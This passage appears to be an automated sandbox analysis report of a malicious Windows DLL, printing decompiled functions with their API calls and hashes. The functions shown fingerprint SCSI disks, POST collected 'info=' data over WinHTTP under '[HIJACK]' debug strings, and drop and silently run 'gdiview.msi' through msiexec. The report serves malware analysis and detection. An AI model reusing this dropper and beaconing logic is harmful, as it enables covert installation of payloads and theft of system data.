					E1000D190(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}



























                                                                                                                                                0x100211b0
                                                                                                                                                0x100211b0
                                                                                                                                                0x100211b0
                                                                                                                                                0x100211b6
                                                                                                                                                0x100211bd
                                                                                                                                                0x100211c4
                                                                                                                                                0x100211cb
                                                                                                                                                0x100211d2
                                                                                                                                                0x100211d9
                                                                                                                                                0x100211e0
                                                                                                                                                0x100211e7
                                                                                                                                                0x100211ed
                                                                                                                                                0x100211f0
                                                                                                                                                0x100211f3
                                                                                                                                                0x100211fe
                                                                                                                                                0x10021203
                                                                                                                                                0x10021208
                                                                                                                                                0x10021222
                                                                                                                                                0x10021225
                                                                                                                                                0x10021230
                                                                                                                                                0x10021235
                                                                                                                                                0x1002123a
                                                                                                                                                0x1002125c
                                                                                                                                                0x10021268
                                                                                                                                                0x1002126e
                                                                                                                                                0x1002123c
                                                                                                                                                0x1002123f
                                                                                                                                                0x1002124b
                                                                                                                                                0x10021251
                                                                                                                                                0x10021251
                                                                                                                                                0x1002127d
                                                                                                                                                0x10021282
                                                                                                                                                0x10021285
                                                                                                                                                0x1002128c
                                                                                                                                                0x100212a0
                                                                                                                                                0x100212a5
                                                                                                                                                0x100212ab
                                                                                                                                                0x1002128e
                                                                                                                                                0x10021297
                                                                                                                                                0x10021297
                                                                                                                                                0x100212bd
                                                                                                                                                0x100212cb
                                                                                                                                                0x100212e4
                                                                                                                                                0x100212fd
                                                                                                                                                0x10021304
                                                                                                                                                0x10021359
                                                                                                                                                0x1002136f
                                                                                                                                                0x1002137d
                                                                                                                                                0x10021390
                                                                                                                                                0x10021306
                                                                                                                                                0x1002131d
                                                                                                                                                0x1002132f
                                                                                                                                                0x1002133d
                                                                                                                                                0x1002134f
                                                                                                                                                0x10021354
                                                                                                                                                0x100213ab
                                                                                                                                                0x100213b2
                                                                                                                                                0x100213fe
                                                                                                                                                0x1002140f
                                                                                                                                                0x100213b4
                                                                                                                                                0x100213bf
                                                                                                                                                0x100213c8
                                                                                                                                                0x100213db
                                                                                                                                                0x100213df
                                                                                                                                                0x100213f4
                                                                                                                                                0x100213f9
                                                                                                                                                0x10021421
                                                                                                                                                0x1002142f
                                                                                                                                                0x1002144a
                                                                                                                                                0x10021452
                                                                                                                                                0x1002120a
                                                                                                                                                0x10021212
                                                                                                                                                0x10021217
                                                                                                                                                0x1002121c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1002121c
                                                                                                                                                0x1002145f

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3056589307-0
                                                                                                                                                • Opcode ID: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                • Instruction ID: b73e38e492334931c567e70ec6057ca77ce0bc3bbcd211be2433ac406d63848b
                                                                                                                                                • Opcode Fuzzy Hash: 9f2506d15e32d62062d7e27f21625b1247e6a1efb5e08f0102daee32226561f0
                                                                                                                                                • Instruction Fuzzy Hash: E3911BB9E00209EFDB00CFA4D991EAFB7B5FF48344F104568F905AB345E635AA14CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001D560, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E1001D560(void* __edi, char* _a4) {
				intOrPtr _v8;
				struct _OVERLAPPED* _v12;
				signed int _v16;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				intOrPtr _v28;
				void* _v32;
				short _v548;
				char _v1010;
				char _v1068;
				char _v1070;
				intOrPtr _v1084;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				void _v1108;
				char _v2132;
				struct _OVERLAPPED* _v2136;
				char _v2137;
				long _v2144;
				struct _OVERLAPPED* _v2148;
				intOrPtr _v2152;
				char* _v2156;
				intOrPtr _t91;
				intOrPtr _t96;
				void* _t125;
				void* _t126;
				void* _t127;

				_t125 = __edi;
				_v20 = 0;
				_v2136 = 0;
				_v24 = 0;
				do {
					wsprintfW( &_v548, L"\\\\.\\Scsi%d:", _v20);
					_t127 = _t127 + 0xc;
					_v32 = CreateFileW( &_v548, 0xc0000000, 3, 0, 3, 0, 0);
					if(_v32 != 0xffffffff) {
						_v12 = 0;
						while(1 != 0) {
							E1000CF20(_t125,  &_v1108, 0, 0x22d);
							_t127 = _t127 + 0xc;
							_v1104 = 0x49534353;
							_v1100 = 0x4b534944;
							_v1068 = _v12;
							_v1108 = 0x1c;
							_v1096 = 0x2710;
							_v1084 = 0x211;
							_v1092 = 0x1b0501;
							_v1070 = 0xec;
							if(DeviceIoControl(_v32, 0x4d008,  &_v1108, 0x3c,  &_v1108, 0x22d,  &_v2144, 0) == 0 || _v1010 == 0) {
								L20:
								if(_v2136 != 0) {
									L23:
								} else {
									_v12 =  &(_v12->Internal);
									if(_v12 < 2) {
										goto L23;
									} else {
										continue;
									}
								}
							} else {
								_v16 = 0;
								do {
									 *(_t126 + _v16 * 4 - 0x850) =  *(_t126 + _v16 * 2 - 0x424) & 0x0000ffff;
									_v16 = _v16 + 1;
								} while (_v16 < 0x100);
								_t91 = E1001CD70( &_v2132);
								_t127 = _t127 + 4;
								_v28 = _t91;
								_v2148 = 0;
								_v8 = 0x104;
								_v2156 = _a4;
								_v2152 = _v28 - _a4;
								while(_v8 != 0x80000106) {
									_v2137 =  *((intOrPtr*)(_v2156 + _v2152));
									if(_v2137 != 0) {
										 *_v2156 = _v2137;
										_v2156 = _v2156 + 1;
										_t96 = _v8 - 1;
										_v8 = _t96;
										if(_t96 != 0) {
											continue;
										} else {
											L17:
											_v2156 = _v2156 - 1;
											_v2148 = 0x8007007a;
										}
									} else {
										break;
									}
									L18:
									 *_v2156 = 0;
									if(_v2148 < 0) {
										goto L20;
									} else {
										goto L24;
									}
									goto L25;
								}
								if(_v8 == 0) {
									goto L17;
								} else {
								}
								goto L18;
							}
							L25:
							CloseHandle(_v32);
							_v20 = _v24;
							goto L26;
						}
						L24:
						_v2136 = 1;
						goto L25;
					}
					L26:
					_v20 =  &(_v20->Internal);
					_v24 = _v20;
				} while (_v20 < 0x10);
				return _v2136;
			}
































                                                                                                                                                0x1001d560
                                                                                                                                                0x1001d569
                                                                                                                                                0x1001d570
                                                                                                                                                0x1001d57a
                                                                                                                                                0x1001d581
                                                                                                                                                0x1001d591
                                                                                                                                                0x1001d597
                                                                                                                                                0x1001d5b6
                                                                                                                                                0x1001d5bd
                                                                                                                                                0x1001d5c3
                                                                                                                                                0x1001d5ca
                                                                                                                                                0x1001d5e5
                                                                                                                                                0x1001d5ea
                                                                                                                                                0x1001d5ed
                                                                                                                                                0x1001d5f7
                                                                                                                                                0x1001d604
                                                                                                                                                0x1001d60a
                                                                                                                                                0x1001d614
                                                                                                                                                0x1001d61e
                                                                                                                                                0x1001d628
                                                                                                                                                0x1001d632
                                                                                                                                                0x1001d668
                                                                                                                                                0x1001d76e
                                                                                                                                                0x1001d775
                                                                                                                                                0x1001d78d
                                                                                                                                                0x1001d777
                                                                                                                                                0x1001d780
                                                                                                                                                0x1001d786
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d788
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d788
                                                                                                                                                0x1001d786
                                                                                                                                                0x1001d67d
                                                                                                                                                0x1001d67d
                                                                                                                                                0x1001d684
                                                                                                                                                0x1001d692
                                                                                                                                                0x1001d69f
                                                                                                                                                0x1001d6a2
                                                                                                                                                0x1001d6b2
                                                                                                                                                0x1001d6b7
                                                                                                                                                0x1001d6ba
                                                                                                                                                0x1001d6bd
                                                                                                                                                0x1001d6c7
                                                                                                                                                0x1001d6d1
                                                                                                                                                0x1001d6dd
                                                                                                                                                0x1001d6e3
                                                                                                                                                0x1001d6fa
                                                                                                                                                0x1001d709
                                                                                                                                                0x1001d719
                                                                                                                                                0x1001d724
                                                                                                                                                0x1001d72d
                                                                                                                                                0x1001d730
                                                                                                                                                0x1001d733
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d735
                                                                                                                                                0x1001d741
                                                                                                                                                0x1001d74a
                                                                                                                                                0x1001d750
                                                                                                                                                0x1001d750
                                                                                                                                                0x1001d70b
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d70b
                                                                                                                                                0x1001d75a
                                                                                                                                                0x1001d760
                                                                                                                                                0x1001d76a
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d76c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d76c
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d76a
                                                                                                                                                0x1001d73d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d73f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d73d
                                                                                                                                                0x1001d79e
                                                                                                                                                0x1001d7a2
                                                                                                                                                0x1001d7ab
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d7ab
                                                                                                                                                0x1001d794
                                                                                                                                                0x1001d794
                                                                                                                                                0x00000000
                                                                                                                                                0x1001d794
                                                                                                                                                0x1001d7ae
                                                                                                                                                0x1001d7b4
                                                                                                                                                0x1001d7ba
                                                                                                                                                0x1001d7bd
                                                                                                                                                0x1001d7d0

                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 1001D591
                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D5B0
                                                                                                                                                • _memset.LIBCMT ref: 1001D5E5
                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 1001D660
                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 1001D7A2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                • API String ID: 3873020565-153650326
                                                                                                                                                • Opcode ID: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                • Instruction ID: ecac459a45c55c39d0c7666526aefe1c13258bf2a5e68f6ccc56cd30cf696479
                                                                                                                                                • Opcode Fuzzy Hash: 2aa39ac6cad2a8bb26720dc438c81d79ebe9cbc317c692aee15183ecf2d7af76
                                                                                                                                                • Instruction Fuzzy Hash: 8C613AB4D04258DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB281DB759AC4CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10022760, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v72;
				char _v100;
				char _v128;
				intOrPtr _v132;
				char _v160;
				char _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				void* __ebp;
				void* _t75;
				void* _t76;
				intOrPtr _t119;
				void* _t127;

				_t127 = __eflags;
				_t118 = __esi;
				_t117 = __edi;
				_t87 = __ebx;
				_push(0xffffffff);
				_push(E10022C17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t119;
				_v192 = 0;
				_push(_a12);
				_push(0x30);
				_push("post_info");
				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
				_v8 = 0;
				_v196 = E10001160( &_v160, _t127, _a8);
				_v200 = _v196;
				_v8 = 1;
				E10001A70( &_v128, _v200);
				_v8 = 0;
				E100011A0( &_v160);
				E10001160( &_v100, _t127, "info=");
				_v8 = 2;
				_v204 = E10001160( &_v188, _t127, _v132);
				_v208 = _v204;
				_v8 = 3;
				E10001A70( &_v100, _v208);
				_v8 = 2;
				E100011A0( &_v188);
				_push(E100011E0( &_v128));
				_push(0x3d);
				_push("post_info");
				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp"));
				E10001160( &_v44, _t127, 0x10024ca2);
				_v8 = 4;
				E10001160( &_v72, _t127, 0x10024ca3);
				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72);
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127);
				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16;
				return _a4;
			}






















                                                                                                                                                0x10022760
                                                                                                                                                0x10022760
                                                                                                                                                0x10022760
                                                                                                                                                0x10022760
                                                                                                                                                0x10022763
                                                                                                                                                0x10022765
                                                                                                                                                0x10022770
                                                                                                                                                0x10022771
                                                                                                                                                0x1002277e
                                                                                                                                                0x1002278b
                                                                                                                                                0x1002278c
                                                                                                                                                0x1002278e
                                                                                                                                                0x100227a4
                                                                                                                                                0x100227b8
                                                                                                                                                0x100227bf
                                                                                                                                                0x100227c7
                                                                                                                                                0x100227dd
                                                                                                                                                0x100227e9
                                                                                                                                                0x100227ef
                                                                                                                                                0x100227fd
                                                                                                                                                0x10022802
                                                                                                                                                0x1002280c
                                                                                                                                                0x10022819
                                                                                                                                                0x1002281e
                                                                                                                                                0x10022831
                                                                                                                                                0x1002283d
                                                                                                                                                0x10022843
                                                                                                                                                0x10022851
                                                                                                                                                0x10022856
                                                                                                                                                0x10022860
                                                                                                                                                0x1002286d
                                                                                                                                                0x1002286e
                                                                                                                                                0x10022870
                                                                                                                                                0x10022886
                                                                                                                                                0x10022896
                                                                                                                                                0x1002289b
                                                                                                                                                0x100228a7
                                                                                                                                                0x100228ac
                                                                                                                                                0x100228c7
                                                                                                                                                0x100228d0
                                                                                                                                                0x100228eb
                                                                                                                                                0x100228f6
                                                                                                                                                0x100228f7
                                                                                                                                                0x10022906
                                                                                                                                                0x10022914
                                                                                                                                                0x1002291a
                                                                                                                                                0x10022921
                                                                                                                                                0x10022926
                                                                                                                                                0x1002292d
                                                                                                                                                0x10022932
                                                                                                                                                0x10022939
                                                                                                                                                0x1002293e
                                                                                                                                                0x10022948
                                                                                                                                                0x10022953
                                                                                                                                                0x1002295d

                                                                                                                                                APIs
                                                                                                                                                • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000030,?), ref: 10022798
                                                                                                                                                  • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
                                                                                                                                                  • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
                                                                                                                                                  • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
                                                                                                                                                  • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
                                                                                                                                                  • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
                                                                                                                                                  • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
                                                                                                                                                  • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
                                                                                                                                                  • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                  • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
                                                                                                                                                • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
                                                                                                                                                  • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                  • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
                                                                                                                                                • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                • API String ID: 728604215-152146038
                                                                                                                                                • Opcode ID: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                • Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
                                                                                                                                                • Opcode Fuzzy Hash: 595fa8cd932e3625ab91877eb1d9ec3bfaedeea9d9515ddbb056345a5ee8ff59
                                                                                                                                                • Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001A480, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                			E1001A480(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CE56(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CE56(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF20(__edi, _v168, 0, 0x21);
				E1000CF20(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAC0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E280(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC10( &_v164);
					E1001CAC0( &_v164, _a4, E1000CAC0(_a4));
					_t67 =  &_v164;
					E1001CBC0( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CC93(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA30(_t57, _t73, _t74, __eflags);
				_v172 = L1000CE56(_t57, _t67, _t73, _t74, 0x11);
				E1000CF20(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D190(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA30(_t57, _t73, _t74, __eflags);
				return _v172;
			}













                                                                                                                                                0x1001a480
                                                                                                                                                0x1001a480
                                                                                                                                                0x1001a480
                                                                                                                                                0x1001a489
                                                                                                                                                0x1001a49a
                                                                                                                                                0x1001a4aa
                                                                                                                                                0x1001a4bb
                                                                                                                                                0x1001a4ce
                                                                                                                                                0x1001a4d6
                                                                                                                                                0x1001a4da
                                                                                                                                                0x1001a4df
                                                                                                                                                0x1001a4e4
                                                                                                                                                0x1001a584
                                                                                                                                                0x1001a589
                                                                                                                                                0x1001a4ea
                                                                                                                                                0x1001a4f1
                                                                                                                                                0x1001a511
                                                                                                                                                0x1001a520
                                                                                                                                                0x1001a527
                                                                                                                                                0x1001a52c
                                                                                                                                                0x1001a52f
                                                                                                                                                0x1001a541
                                                                                                                                                0x1001a568
                                                                                                                                                0x1001a56c
                                                                                                                                                0x1001a571
                                                                                                                                                0x1001a53e
                                                                                                                                                0x1001a53e
                                                                                                                                                0x1001a576
                                                                                                                                                0x1001a592
                                                                                                                                                0x1001a593
                                                                                                                                                0x1001a5a5
                                                                                                                                                0x1001a5b6
                                                                                                                                                0x1001a5c6
                                                                                                                                                0x1001a5d1
                                                                                                                                                0x1001a5df
                                                                                                                                                0x1001a5e0
                                                                                                                                                0x1001a5f1

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                • API String ID: 796335831-606320477
                                                                                                                                                • Opcode ID: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                • Instruction ID: 5f34500701607727b308b008c02476916cf30523b6eb1de7e1c0da2fd1923ee1
                                                                                                                                                • Opcode Fuzzy Hash: cddf9aa94f1a26cbff01d8f54016213bcb26ef308eb76885f362afd6834819d9
                                                                                                                                                • Instruction Fuzzy Hash: 6D3162BAE0030CABEB10DB60DC42FAE7375DF46344F0444A4F9496B246E671EB949B93
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 1001FC70, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC10( &_v1292, 0x10026888, 0x39e00);
				_t21 = PathFileExistsA( &_v1292);
				_t38 = _t21;
				if(_t21 != 0) {
					return E1001A1D0(_t38,  &_v1028);
				}
				return _t21;
			}








                                                                                                                                                0x1001fc70
                                                                                                                                                0x1001fc79
                                                                                                                                                0x1001fc8e
                                                                                                                                                0x1001fc96
                                                                                                                                                0x1001fcab
                                                                                                                                                0x1001fcbf
                                                                                                                                                0x1001fcd6
                                                                                                                                                0x1001fcf1
                                                                                                                                                0x1001fd0a
                                                                                                                                                0x1001fd19
                                                                                                                                                0x1001fd1f
                                                                                                                                                0x1001fd21
                                                                                                                                                0x00000000
                                                                                                                                                0x1001fd2f
                                                                                                                                                0x1001fd35

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                  • Part of subcall function 1001FC10: CreateFileA.KERNEL32(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                  • Part of subcall function 1001FC10: WriteFile.KERNEL32(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                  • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                • PathFileExistsA.SHLWAPI(00000000), ref: 1001FD19
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                  • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                • API String ID: 1459467440-729886463
                                                                                                                                                • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 10020575, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 89%
                                                                                                                                                			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
